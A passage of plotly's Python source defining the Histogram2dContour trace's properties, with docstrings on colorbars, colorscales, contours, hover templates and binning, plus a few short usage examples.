"xhoverformat",
"xsrc",
"y",
"yaxis",
"ybingroup",
"ybins",
"ycalendar",
"yhoverformat",
"ysrc",
"z",
"zauto",
"zhoverformat",
"zmax",
"zmid",
"zmin",
"zsrc",
}
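# Minimal usage sketch (assumes plotly and numpy are installed); in practice the
# trace is constructed through plotly.graph_objects rather than imported from
# this module directly:
#
#   import numpy as np
#   import plotly.graph_objects as go
#   x, y = np.random.randn(500), np.random.randn(500)
#   fig = go.Figure(go.Histogram2dContour(x=x, y=y, colorscale='Blues',
#                                         ncontours=15, histnorm='probability'))
#   fig.show()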
# autobinx
# --------
@property
def autobinx(self):
"""
Obsolete: since v1.42 each bin attribute is auto-determined
separately and `autobinx` is not needed. However, we accept
`autobinx: true` or `false` and will update `xbins` accordingly
before deleting `autobinx` from the trace.
The 'autobinx' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["autobinx"]
@autobinx.setter
def autobinx(self, val):
self["autobinx"] = val
# autobiny
# --------
@property
def autobiny(self):
"""
Obsolete: since v1.42 each bin attribute is auto-determined
separately and `autobiny` is not needed. However, we accept
`autobiny: true` or `false` and will update `ybins` accordingly
before deleting `autobiny` from the trace.
The 'autobiny' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["autobiny"]
@autobiny.setter
def autobiny(self, val):
self["autobiny"] = val
# autocolorscale
# --------------
@property
def autocolorscale(self):
"""
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`colorscale`. In case `colorscale` is unspecified or
`autocolorscale` is true, the default palette will be chosen
according to whether numbers in the `color` array are all
positive, all negative or mixed.
The 'autocolorscale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["autocolorscale"]
@autocolorscale.setter
def autocolorscale(self, val):
self["autocolorscale"] = val
# autocontour
# -----------
@property
def autocontour(self):
"""
Determines whether or not the contour level attributes are
picked by an algorithm. If True, the number of contour levels
can be set in `ncontours`. If False, set the contour level
attributes in `contours`.
The 'autocontour' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["autocontour"]
@autocontour.setter
def autocontour(self, val):
self["autocontour"] = val
# bingroup
# --------
@property
def bingroup(self):
"""
Set the `xbingroup` and `ybingroup` default prefix. For example,
setting a `bingroup` of 1 on two histogram2d traces will make
their x-bins and y-bins match separately.
The 'bingroup' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["bingroup"]
@bingroup.setter
def bingroup(self, val):
self["bingroup"] = val
# coloraxis
# ---------
@property
def coloraxis(self):
"""
Sets a reference to a shared color axis. References to these
shared color axes are "coloraxis", "coloraxis2", "coloraxis3",
etc. Settings for these shared color axes are set in the
layout, under `layout.coloraxis`, `layout.coloraxis2`, etc.
Note that multiple color scales can be linked to the same color
axis.
The 'coloraxis' property is an identifier of a particular
subplot, of type 'coloraxis', that may be specified as the string 'coloraxis'
optionally followed by an integer >= 1
(e.g. 'coloraxis', 'coloraxis1', 'coloraxis2', 'coloraxis3', etc.)
Returns
-------
str
"""
return self["coloraxis"]
@coloraxis.setter
def coloraxis(self, val):
self["coloraxis"] = val
# colorbar
# --------
@property
def colorbar(self):
"""
The 'colorbar' property is an instance of ColorBar
that may be specified as:
- An instance of :class:`plotly.graph_objs.histogram2dcontour.ColorBar`
- A dict of string/value properties that will be passed
to the ColorBar constructor
Supported dict properties:
bgcolor
Sets the color of padded area.
bordercolor
Sets the axis line color.
borderwidth
Sets the width (in px) or the border enclosing
this color bar.
dtick
Sets the step in-between ticks on this axis.
Use with `tick0`. Must be a positive number, or
special strings available to "log" and "date"
axes. If the axis `type` is "log", then ticks
are set every 10^(n*dtick) where n is the tick
number. For example, to set a tick mark at 1,
10, 100, 1000, ... set dtick to 1. To set tick
marks at 1, 100, 10000, ... set dtick to 2. To
set tick marks at 1, 5, 25, 125, 625, 3125, ...
set dtick to log_10(5), or 0.69897000433. "log"
has several special values; "L<f>", where `f`
is a positive number, gives ticks linearly
spaced in value (but not position). For example
`tick0` = 0.1, `dtick` = "L0.5" will put ticks
at 0.1, 0.6, 1.1, 1.6 etc. To show powers of 10
plus small digits between, use "D1" (all
digits) or "D2" (only 2 and 5). `tick0` is
ignored for "D1" and "D2". If the axis `type`
is "date", then you must convert the time to
milliseconds. For example, to set the interval
between ticks to one day, set `dtick` to
86400000.0. "date" also has special values
"M<n>" gives ticks spaced by a number of
months. `n` must be a positive integer. To set
ticks on the 15th of every third month, set
`tick0` to "2000-01-15" and `dtick` to "M3". To
set ticks every 4 years, set `dtick` to "M48"
exponentformat
Determines a formatting rule for the tick
exponents. For example, consider the number
1,000,000,000. If "none", it appears as
1,000,000,000. If "e", 1e+9. If "E", 1E+9. If
"power", 1x10^9 (with 9 in a super script). If
"SI", 1G. If "B", 1B.
len
Sets the length of the color bar This measure
excludes the padding of both ends. That is, the
color bar length is this length minus the
padding on both ends.
lenmode
Determines whether this color bar's length
(i.e. the measure in the color variation
direction) is set in units of plot "fraction"
or in "pixels". Use `len` to set the value.
minexponent
Hide SI prefix for 10^n if |n| is below this
number. This only has an effect when
`tickformat` is "SI" or "B".
nticks
Specifies the maximum number of ticks for the
particular axis. The actual number of ticks
will be chosen automatically to be less than or
equal to `nticks`. Has an effect only if
`tickmode` is set to "auto".
orientation
Sets the orientation of the colorbar.
outlinecolor
Sets the axis line color.
outlinewidth
Sets the width (in px) of the axis line.
separatethousands
If "true", even 4-digit integers are separated
showexponent
If "all", all exponents are shown besides their
significands. If "first", only the exponent of
the first tick is shown. If "last", only the
exponent of the last tick is shown. If "none",
no exponents appear.
showticklabels
Determines whether or not the tick labels are
drawn.
showtickprefix
If "all", all tick labels are displayed with a
prefix. If "first", only the first tick is
displayed with a prefix. If "last", only the
last tick is displayed with a suffix. If
"none", tick prefixes are hidden.
showticksuffix
Same as `showtickprefix` but for tick suffixes.
thickness
Sets the thickness of the color bar This
measure excludes the size of the padding, ticks
and labels.
thicknessmode
Determines whether this color bar's thickness
(i.e. the measure in the constant color
direction) is set in units of plot "fraction"
or in "pixels". Use `thickness` to set the
value.
tick0
Sets the placement of the first tick on this
axis. Use with `dtick`. If the axis `type` is
"log", then you must take the log of your
starting tick (e.g. to set the starting tick to
100, set the `tick0` to 2) except when
`dtick`=*L<f>* (see `dtick` for more info). If
the axis `type` is "date", it should be a date
string, like date data. If the axis `type` is
"category", it should be a number, using the
scale where each category is assigned a serial
number from zero in the order it appears.
tickangle
Sets the angle of the tick labels with respect
to the horizontal. For example, a `tickangle`
of -90 draws the tick labels vertically.
tickcolor
Sets the tick color.
tickfont
Sets the color bar's tick label font
tickformat
Sets the tick label formatting rule using d3
formatting mini-languages which are very
similar to those in Python. For numbers, see: h
ttps://github.com/d3/d3-format/tree/v1.4.5#d3-f
ormat. And for dates see:
https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format. We add two
items to d3's date formatter: "%h" for half of
the year as a decimal number as well as "%{n}f"
for fractional seconds with n digits. For
example, *2016-10-13 09:15:23.456* with
tickformat "%H~%M~%S.%2f" would display
"09~15~23.46"
tickformatstops
A tuple of :class:`plotly.graph_objects.histogr
am2dcontour.colorbar.Tickformatstop` instances
or dicts with compatible properties
tickformatstopdefaults
When used in a template (as layout.template.dat
a.histogram2dcontour.colorbar.tickformatstopdef
aults), sets the default property values to use
for elements of
histogram2dcontour.colorbar.tickformatstops
ticklabeloverflow
Determines how we handle tick labels that would
overflow either the graph div or the domain of
the axis. The default value for inside tick
labels is *hide past domain*. In other cases
the default is *hide past div*.
ticklabelposition
Determines where tick labels are drawn relative
to the ticks. Left and right options are used
when `orientation` is "h", top and bottom when
`orientation` is "v".
ticklabelstep
Sets the spacing between tick labels as
compared to the spacing between ticks. A value
of 1 (default) means each tick gets a label. A
value of 2 means shows every 2nd label. A
larger value n means only every nth tick is
labeled. `tick0` determines which labels are
shown. Not implemented for axes with `type`
"log" or "multicategory", or when `tickmode` is
"array".
ticklen
Sets the tick length (in px).
tickmode
Sets the tick mode for this axis. If "auto",
the number of ticks is set via `nticks`. If
"linear", the placement of the ticks is
determined by a starting position `tick0` and a
tick step `dtick` ("linear" is the default
value if `tick0` and `dtick` are provided). If
"array", the placement of the ticks is set via
`tickvals` and the tick text is `ticktext`.
("array" is the default value if `tickvals` is
provided).
tickprefix
Sets a tick label prefix.
ticks
Determines whether ticks are drawn or not. If
"", this axis' ticks are not drawn. If
"outside" ("inside"), this axis' are drawn
outside (inside) the axis lines.
ticksuffix
Sets a tick label suffix.
ticktext
Sets the text displayed at the ticks position
via `tickvals`. Only has an effect if
`tickmode` is set to "array". Used with
`tickvals`.
ticktextsrc
Sets the source reference on Chart Studio Cloud
for `ticktext`.
tickvals
Sets the values at which ticks on this axis
appear. Only has an effect if `tickmode` is set
to "array". Used with `ticktext`.
tickvalssrc
Sets the source reference on Chart Studio Cloud
for `tickvals`.
tickwidth
Sets the tick width (in px).
title
:class:`plotly.graph_objects.histogram2dcontour
.colorbar.Title` instance or dict with
compatible properties
titlefont
Deprecated: Please use
histogram2dcontour.colorbar.title.font instead.
Sets this color bar's title font. Note that the
title's font used to be set by the now
deprecated `titlefont` attribute.
titleside
Deprecated: Please use
histogram2dcontour.colorbar.title.side instead.
Determines the location of color bar's title
with respect to the color bar. Defaults to
"top" when `orientation` if "v" and defaults
to "right" when `orientation` if "h". Note that
the title's location used to be set by the now
deprecated `titleside` attribute.
x
Sets the x position of the color bar (in plot
fraction). Defaults to 1.02 when `orientation`
is "v" and 0.5 when `orientation` is "h".
xanchor
Sets this color bar's horizontal position
anchor. This anchor binds the `x` position to
the "left", "center" or "right" of the color
bar. Defaults to "left" when `orientation` is
"v" and "center" when `orientation` is "h".
xpad
Sets the amount of padding (in px) along the x
direction.
y
Sets the y position of the color bar (in plot
fraction). Defaults to 0.5 when `orientation`
is "v" and 1.02 when `orientation` is "h".
yanchor
Sets this color bar's vertical position anchor
This anchor binds the `y` position to the
"top", "middle" or "bottom" of the color bar.
Defaults to "middle" when `orientation` is "v"
and "bottom" when `orientation` is "h".
ypad
Sets the amount of padding (in px) along the y
direction.
Returns
-------
plotly.graph_objs.histogram2dcontour.ColorBar
"""
return self["colorbar"]
@colorbar.setter
def colorbar(self, val):
self["colorbar"] = val
# colorscale
# ----------
@property
def colorscale(self):
"""
Sets the colorscale. The colorscale must be an array containing
arrays mapping a normalized value to an rgb, rgba, hex, hsl,
hsv, or named color string. At minimum, a mapping for the
lowest (0) and highest (1) values are required. For example,
`[[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']]`. To control the
bounds of the colorscale in color space, use `zmin` and `zmax`.
Alternatively, `colorscale` may be a palette name string of the
following list: Blackbody,Bluered,Blues,Cividis,Earth,Electric,
Greens,Greys,Hot,Jet,Picnic,Portland,Rainbow,RdBu,Reds,Viridis,
YlGnBu,YlOrRd.
The 'colorscale' property is a colorscale and may be
specified as:
- A list of colors that will be spaced evenly to create the colorscale.
Many predefined colorscale lists are included in the sequential, diverging,
and cyclical modules in the plotly.colors package.
- A list of 2-element lists where the first element is the
normalized color level value (starting at 0 and ending at 1),
and the second item is a valid color string.
(e.g. [[0, 'green'], [0.5, 'red'], [1.0, 'rgb(0, 0, 255)']])
- One of the following named colorscales:
['aggrnyl', 'agsunset', 'algae', 'amp', 'armyrose', 'balance',
'blackbody', 'bluered', 'blues', 'blugrn', 'bluyl', 'brbg',
'brwnyl', 'bugn', 'bupu', 'burg', 'burgyl', 'cividis', 'curl',
'darkmint', 'deep', 'delta', 'dense', 'earth', 'edge', 'electric',
'emrld', 'fall', 'geyser', 'gnbu', 'gray', 'greens', 'greys',
'haline', 'hot', 'hsv', 'ice', 'icefire', 'inferno', 'jet',
'magenta', 'magma', 'matter', 'mint', 'mrybm', 'mygbm', 'oranges',
'orrd', 'oryel', 'oxy', 'peach', 'phase', 'picnic', 'pinkyl',
'piyg', 'plasma', 'plotly3', 'portland', 'prgn', 'pubu', 'pubugn',
'puor', 'purd', 'purp', 'purples', 'purpor', 'rainbow', 'rdbu',
'rdgy', 'rdpu', 'rdylbu', 'rdylgn', 'redor', 'reds', 'solar',
'spectral', 'speed', 'sunset', 'sunsetdark', 'teal', 'tealgrn',
'tealrose', 'tempo', 'temps', 'thermal', 'tropic', 'turbid',
'turbo', 'twilight', 'viridis', 'ylgn', 'ylgnbu', 'ylorbr',
'ylorrd'].
Appending '_r' to a named colorscale reverses it.
Returns
-------
str
"""
return self["colorscale"]
@colorscale.setter
def colorscale(self, val):
self["colorscale"] = val
# contours
# --------
@property
def contours(self):
"""
The 'contours' property is an instance of Contours
that may be specified as:
- An instance of :class:`plotly.graph_objs.histogram2dcontour.Contours`
- A dict of string/value properties that will be passed
to the Contours constructor
Supported dict properties:
coloring
Determines the coloring method showing the
contour values. If "fill", coloring is done
evenly between each contour level If "heatmap",
a heatmap gradient coloring is applied between
each contour level. If "lines", coloring is
done on the contour lines. If "none", no
coloring is applied on this trace.
end
Sets the end contour level value. Must be more
than `contours.start`
labelfont
Sets the font used for labeling the contour
levels. The default color comes from the lines,
if shown. The default family and size come from
`layout.font`.
labelformat
Sets the contour label formatting rule using d3
formatting mini-languages which are very
similar to those in Python. For numbers, see: h
ttps://github.com/d3/d3-format/tree/v1.4.5#d3-f
ormat.
operation
Sets the constraint operation. "=" keeps
regions equal to `value` "<" and "<=" keep
regions less than `value` ">" and ">=" keep
regions greater than `value` "[]", "()", "[)",
and "(]" keep regions inside `value[0]` to
`value[1]` "][", ")(", "](", ")[" keep regions
outside `value[0]` to value[1]` Open vs. closed
intervals make no difference to constraint
display, but all versions are allowed for
consistency with filter transforms.
showlabels
Determines whether to label the contour lines
with their values.
showlines
Determines whether or not the contour lines are
drawn. Has an effect only if
`contours.coloring` is set to "fill".
size
Sets the step between each contour level. Must
be positive.
start
Sets the starting contour level value. Must be
less than `contours.end`
type
If `levels`, the data is represented as a
contour plot with multiple levels displayed. If
`constraint`, the data is represented as
constraints with the invalid region shaded as
specified by the `operation` and `value`
parameters.
value
Sets the value or values of the constraint
boundary. When `operation` is set to one of the
comparison values (=,<,>=,>,<=) "value" is
expected to be a number. When `operation` is
set to one of the interval values
([],(),[),(],][,)(,](,)[) "value" is expected
to be an array of two numbers where the first
is the lower bound and the second is the upper
bound.
Returns
-------
plotly.graph_objs.histogram2dcontour.Contours
"""
return self["contours"]
@contours.setter
def contours(self, val):
self["contours"] = val
# customdata
# ----------
@property
def customdata(self):
"""
Assigns extra data to each datum. This may be useful when
listening to hover, click and selection events. Note that,
"scatter" traces also appends customdata items in the markers
DOM elements
The 'customdata' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["customdata"]
@customdata.setter
def customdata(self, val):
self["customdata"] = val
# customdatasrc
# -------------
@property
def customdatasrc(self):
"""
Sets the source reference on Chart Studio Cloud for
`customdata`.
The 'customdatasrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["customdatasrc"]
@customdatasrc.setter
def customdatasrc(self, val):
self["customdatasrc"] = val
# histfunc
# --------
@property
def histfunc(self):
"""
Specifies the binning function used for this histogram trace.
If "count", the histogram values are computed by counting the
number of values lying inside each bin. If "sum", "avg", "min",
"max", the histogram values are computed using the sum, the
average, the minimum or the maximum of the values lying inside
each bin respectively.
The 'histfunc' property is an enumeration that may be specified as:
- One of the following enumeration values:
['count', 'sum', 'avg', 'min', 'max']
Returns
-------
Any
"""
return self["histfunc"]
@histfunc.setter
def histfunc(self, val):
self["histfunc"] = val
# histnorm
# --------
@property
def histnorm(self):
"""
Specifies the type of normalization used for this histogram
trace. If "", the span of each bar corresponds to the number of
occurrences (i.e. the number of data points lying inside the
bins). If "percent" / "probability", the span of each bar
corresponds to the percentage / fraction of occurrences with
respect to the total number of sample points (here, the sum of
all bin HEIGHTS equals 100% / 1). If "density", the span of
each bar corresponds to the number of occurrences in a bin
divided by the size of the bin interval (here, the sum of all
bin AREAS equals the total number of sample points). If
*probability density*, the area of each bar corresponds to the
probability that an event will fall into the corresponding bin
(here, the sum of all bin AREAS equals 1).
The 'histnorm' property is an enumeration that may be specified as:
- One of the following enumeration values:
['', 'percent', 'probability', 'density', 'probability
density']
Returns
-------
Any
"""
return self["histnorm"]
@histnorm.setter
def histnorm(self, val):
self["histnorm"] = val
# hoverinfo
# ---------
@property
def hoverinfo(self):
"""
Determines which trace information appear on hover. If `none`
or `skip` are set, no information is displayed upon hovering.
But, if `none` is set, click and hover events are still fired.
The 'hoverinfo' property is a flaglist and may be specified
as a string containing:
- Any combination of ['x', 'y', 'z', 'text', 'name'] joined with '+' characters
(e.g. 'x+y')
OR exactly one of ['all', 'none', 'skip'] (e.g. 'skip')
- A list or array of the above
Returns
-------
Any|numpy.ndarray
"""
return self["hoverinfo"]
@hoverinfo.setter
def hoverinfo(self, val):
self["hoverinfo"] = val
# hoverinfosrc
# ------------
@property
def hoverinfosrc(self):
"""
Sets the source reference on Chart Studio Cloud for
`hoverinfo`.
The 'hoverinfosrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["hoverinfosrc"]
@hoverinfosrc.setter
def hoverinfosrc(self, val):
self["hoverinfosrc"] = val
# hoverlabel
# ----------
@property
def hoverlabel(self):
"""
The 'hoverlabel' property is an instance of Hoverlabel
that may be specified as:
- An instance of :class:`plotly.graph_objs.histogram2dcontour.Hoverlabel`
- A dict of string/value properties that will be passed
to the Hoverlabel constructor
Supported dict properties:
align
Sets the horizontal alignment of the text
content within hover label box. Has an effect
only if the hover label text spans two or
more lines
alignsrc
Sets the source reference on Chart Studio Cloud
for `align`.
bgcolor
Sets the background color of the hover labels
for this trace
bgcolorsrc
Sets the source reference on Chart Studio Cloud
for `bgcolor`.
bordercolor
Sets the border color of the hover labels for
this trace.
bordercolorsrc
Sets the source reference on Chart Studio Cloud
for `bordercolor`.
font
Sets the font used in hover labels.
namelength
Sets the default length (in number of
characters) of the trace name in the hover
labels for all traces. -1 shows the whole name
regardless of length. 0-3 shows the first 0-3
characters, and an integer >3 will show the
whole name if it is less than that many
characters, but if it is longer, will truncate
to `namelength - 3` characters and add an
ellipsis.
namelengthsrc
Sets the source reference on Chart Studio Cloud
for `namelength`.
Returns
-------
plotly.graph_objs.histogram2dcontour.Hoverlabel
"""
return self["hoverlabel"]
@hoverlabel.setter
def hoverlabel(self, val):
self["hoverlabel"] = val
# hovertemplate
# -------------
@property
def hovertemplate(self):
"""
Template string used for rendering the information that appear
on hover box. Note that this will override `hoverinfo`.
Variables are inserted using %{variable}, for example "y: %{y}"
as well as %{xother}, {%_xother}, {%_xother_}, {%xother_}. When
showing info for several points, "xother" will be added to
those with different x positions from the first point. An
underscore before or after "(x|y)other" will add a space on
that side, only when this field is shown. Numbers are formatted
using d3-format's syntax %{variable:d3-format}, for example
"Price: %{y:$.2f}".
https://github.com/d3/d3-format/tree/v1.4.5#d3-format for
details on the formatting syntax. Dates are formatted using
d3-time-format's syntax %{variable|d3-time-format}, for example
"Day: %{2019-01-01|%A}". https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format for details on the date
formatting syntax. The variables available in `hovertemplate`
are the ones emitted as event data described at this link
https://plotly.com/javascript/plotlyjs-events/#event-data.
Additionally, every attribute that can be specified per-point
(the ones that are `arrayOk: true`) is available, as is the variable `z`.
Anything contained in tag `<extra>` is displayed in the
secondary box, for example "<extra>{fullData.name}</extra>". To
hide the secondary box completely, use an empty tag
`<extra></extra>`.
The 'hovertemplate' property is a string and must be specified as:
- A string
- A number that will be converted to a string
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
str|numpy.ndarray
"""
return self["hovertemplate"]
@hovertemplate.setter
def hovertemplate(self, val):
self["hovertemplate"] = val
# hovertemplatesrc
# ----------------
@property
def hovertemplatesrc(self):
"""
Sets the source reference on Chart Studio Cloud for
`hovertemplate`.
The 'hovertemplatesrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["hovertemplatesrc"]
@hovertemplatesrc.setter
def hovertemplatesrc(self, val):
self["hovertemplatesrc"] = val
# ids
# ---
@property
def ids(self):
"""
Assigns id labels to each datum. These ids are used for object constancy
of data points during animation. Should be an array of strings,
not numbers or any other type.
The 'ids' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["ids"]
@ids.setter
def ids(self, val):
self["ids"] = val
# idssrc
# ------
@property
def idssrc(self):
"""
Sets the source reference on Chart Studio Cloud for `ids`.
The 'idssrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["idssrc"]
@idssrc.setter
def idssrc(self, val):
self["idssrc"] = val
# legendgroup
# -----------
@property
def legendgroup(self):
"""
Sets the legend group for this trace. Traces part of the same
legend group hide/show at the same time when toggling legend
items.
The 'legendgroup' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["legendgroup"]
@legendgroup.setter
def legendgroup(self, val):
self["legendgroup"] = val
# legendgrouptitle
# ----------------
@property
def legendgrouptitle(self):
"""
The 'legendgrouptitle' property is an instance of Legendgrouptitle
that may be specified as:
- An instance of :class:`plotly.graph_objs.histogram2dcontour.Legendgrouptitle`
- A dict of string/value properties that will be passed
to the Legendgrouptitle constructor
Supported dict properties:
font
Sets this legend group's title font.
text
Sets the title of the legend group.
Returns
-------
plotly.graph_objs.histogram2dcontour.Legendgrouptitle
"""
return self["legendgrouptitle"]
@legendgrouptitle.setter
def legendgrouptitle(self, val):
self["legendgrouptitle"] = val
# legendrank
# ----------
@property
def legendrank(self):
"""
Sets the legend rank for this trace. Items and groups with
smaller ranks are presented on top/left side while with
`*reversed* `legend.traceorder` they are on bottom/right side.
The default legendrank is 1000, so that you can use ranks less
than 1000 to place certain items before all unranked items, and
ranks greater than 1000 to go after all unranked items.
The 'legendrank' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["legendrank"]
@legendrank.setter
def legendrank(self, val):
self["legendrank"] = val
# line
# ----
@property
def line(self):
"""
The 'line' property is an instance of Line
that may be specified as:
- An instance of :class:`plotly.graph_objs.histogram2dcontour.Line`
- A dict of string/value properties that will be passed
to the Line constructor
Supported dict properties:
color
Sets the color of the contour level. Has no
effect if `contours.coloring` is set to
"lines".
dash
Sets the dash style of lines. Set to a dash
type string ("solid", "dot", "dash",
"longdash", "dashdot", or "longdashdot") or a
dash length list in px (eg "5px,10px,2px,2px").
smoothing
Sets the amount of smoothing for the contour
lines, where 0 corresponds to no smoothing.
width
Sets the contour line width in (in px)
Returns
-------
plotly.graph_objs.histogram2dcontour.Line
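
Example (an illustrative sketch; the styling values are arbitrary
and only meant to show the dict form accepted here):

    import plotly.graph_objects as go

    trace = go.Histogram2dContour(
        x=[1, 2, 2, 3],
        y=[4, 4, 5, 6],
        line=dict(width=1, dash="dot", smoothing=1.3),
    )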
"""
return self["line"]
@line.setter
def line(self, val):
self["line"] = val
# marker
# ------
@property
def marker(self):
"""
The 'marker' property is an instance of Marker
that may be specified as:
- An instance of :class:`plotly.graph_objs.histogram2dcontour.Marker`
- A dict of string/value properties that will be passed
to the Marker constructor
Supported dict properties:
color
Sets the aggregation data.
colorsrc
Sets the source reference on Chart Studio Cloud
for `color`.
Returns
-------
plotly.graph_objs.histogram2dcontour.Marker
"""
return self["marker"]
@marker.setter
def marker(self, val):
self["marker"] = val
# meta
# ----
@property
def meta(self):
"""
Assigns extra meta information associated with this trace that
can be used in various text attributes. Attributes such as
trace `name`, graph, axis and colorbar `title.text`, annotation
`text`, `rangeselector`, `updatemenus` and `sliders` `label`
text all support `meta`. To access the trace `meta` values in
an attribute in the same trace, simply use `%{meta[i]}` where
`i` is the index or key of the `meta` item in question. To
access trace `meta` in layout attributes, use
`%{data[n].meta[i]}` where `i` is the index or key of the
`meta` and `n` is the trace index.
The 'meta' property accepts values of any type
Returns
-------
Any|numpy.ndarray
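
Example (an illustrative sketch; the meta value and the
hovertemplate text are made up for demonstration):

    import plotly.graph_objects as go

    trace = go.Histogram2dContour(
        x=[1, 2, 3],
        y=[4, 5, 6],
        meta=["run A"],
        hovertemplate="%{meta[0]}: %{z}<extra></extra>",
    )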
"""
return self["meta"]
@meta.setter
def meta(self, val):
self["meta"] = val
# metasrc
# -------
@property
def metasrc(self):
"""
Sets the source reference on Chart Studio Cloud for `meta`.
The 'metasrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["metasrc"]
@metasrc.setter
def metasrc(self, val):
self["metasrc"] = val
# name
# ----
@property
def name(self):
"""
Sets the trace name. The trace name appears as the legend item
and on hover.
The 'name' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["name"]
@name.setter
def name(self, val):
self["name"] = val
# nbinsx
# ------
@property
def nbinsx(self):
"""
Specifies the maximum number of desired bins. This value will
be used in an algorithm that will decide the optimal bin size
such that the histogram best visualizes the distribution of the
data. Ignored if `xbins.size` is provided.
The 'nbinsx' property is an integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [0, 9223372036854775807]
Returns
-------
int
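
Example (an illustrative sketch; the sample data and bin counts
are arbitrary):

    import plotly.graph_objects as go

    trace = go.Histogram2dContour(
        x=[0.1, 0.4, 0.4, 0.9, 1.2],
        y=[2.0, 2.1, 2.5, 2.5, 3.0],
        nbinsx=10,
        nbinsy=10,
    )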
"""
return self["nbinsx"]
@nbinsx.setter
def nbinsx(self, val):
self["nbinsx"] = val
# nbinsy
# ------
@property
def nbinsy(self):
"""
Specifies the maximum number of desired bins. This value will
be used in an algorithm that will decide the optimal bin size
such that the histogram best visualizes the distribution of the
data. Ignored if `ybins.size` is provided.
The 'nbinsy' property is an integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [0, 9223372036854775807]
Returns
-------
int
"""
return self["nbinsy"]
@nbinsy.setter
def nbinsy(self, val):
self["nbinsy"] = val
# ncontours
# ---------
@property
def ncontours(self):
"""
Sets the maximum number of contour levels. The actual number of
contours will be chosen automatically to be less than or equal
to the value of `ncontours`. Has an effect only if
`autocontour` is True or if `contours.size` is missing.
The 'ncontours' property is an integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [1, 9223372036854775807]
Returns
-------
int
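
Example (an illustrative sketch; `autocontour` is left at its
default of True so that `ncontours` takes effect, and the data
values are made up):

    import plotly.graph_objects as go

    trace = go.Histogram2dContour(
        x=[1, 1, 2, 3, 3, 3],
        y=[4, 5, 5, 5, 6, 6],
        ncontours=15,
    )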
"""
return self["ncontours"]
@ncontours.setter
def ncontours(self, val):
self["ncontours"] = val
# opacity
# -------
@property
def opacity(self):
"""
Sets the opacity of the trace.
The 'opacity' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self["opacity"]
@opacity.setter
def opacity(self, val):
self["opacity"] = val
# reversescale
# ------------
@property
def reversescale(self):
"""
Reverses the color mapping if true. If true, `zmin` will
correspond to the last color in the array and `zmax` will
correspond to the first color.
The 'reversescale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["reversescale"]
@reversescale.setter
def reversescale(self, val):
self["reversescale"] = val
# showlegend
# ----------
@property
def showlegend(self):
"""
Determines whether or not an item corresponding to this trace
is shown in the legend.
The 'showlegend' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["showlegend"]
@showlegend.setter
def showlegend(self, val):
self["showlegend"] = val
# showscale
# ---------
@property
def showscale(self):
"""
Determines whether or not a colorbar is displayed for this
trace.
The 'showscale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["showscale"]
@showscale.setter
def showscale(self, val):
self["showscale"] = val
# stream
# ------
@property
def stream(self):
"""
The 'stream' property is an instance of Stream
that may be specified as:
- An instance of :class:`plotly.graph_objs.histogram2dcontour.Stream`
- A dict of string/value properties that will be passed
to the Stream constructor
Supported dict properties:
maxpoints
Sets the maximum number of points to keep on
the plots from an incoming stream. If
`maxpoints` is set to 50, only the newest 50
points will be displayed on the plot.
token
The stream id number links a data trace on a
plot with a stream. See https://chart-
studio.plotly.com/settings for more details.
Returns
-------
plotly.graph_objs.histogram2dcontour.Stream
"""
return self["stream"]
@stream.setter
def stream(self, val):
self["stream"] = val
# textfont
# --------
@property
def textfont(self):
"""
For this trace it only has an effect if `coloring` is set to
"heatmap". Sets the text font.
The 'textfont' property is an instance of Textfont
that may be specified as:
- An instance of :class:`plotly.graph_objs.histogram2dcontour.Textfont`
- A dict of string/value properties that will be passed
to the Textfont constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
plotly.graph_objs.histogram2dcontour.Textfont
"""
return self["textfont"]
@textfont.setter
def textfont(self, val):
self["textfont"] = val
# texttemplate
# ------------
@property
def texttemplate(self):
"""
For this trace it only has an effect if `coloring` is set to
"heatmap". Template string used for rendering the information
text that appear on points. Note that this will override
`textinfo`. Variables are inserted using %{variable}, for
example "y: %{y}". Numbers are formatted using d3-format's
syntax %{variable:d3-format}, for example "Price: %{y:$.2f}".
https://github.com/d3/d3-format/tree/v1.4.5#d3-format for
details on the formatting syntax. Dates are formatted using
d3-time-format's syntax %{variable|d3-time-format}, for example
"Day: %{2019-01-01|%A}". https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format for details on the date
formatting syntax. Every attribute that can be specified per-
